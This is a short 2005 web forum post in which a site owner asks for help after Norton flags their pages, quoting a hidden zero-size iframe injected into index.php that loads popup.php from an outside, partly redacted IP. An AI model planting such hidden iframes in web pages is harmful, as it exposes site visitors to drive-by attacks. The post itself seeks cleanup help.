Forum Moderators: coopster
We received a few calls saying that they are getting a warning when they visit our websites. The warning from Norton is that the pages are infected with Bloodhound.exploit.6
I have checked Symantec and it says that this does not affect Linux!
I found the following code at the end of index.php page on the server:
<iframe src="http://#*$!.xxx.xxx.xxx/pop/popup.php" frameborder="0" width="0" height="0" style="dispaly:none; visibility:hidden" ></iframe>
Please help me here, how can I locate and remove the problem.
My site is on a shared host server is Linux, running on CPanel
Any help is very much appreciated.
Regards.
[edited by: jatar_k at 5:29 pm (utc) on July 29, 2005]
[edit reason] generalized ip [/edit]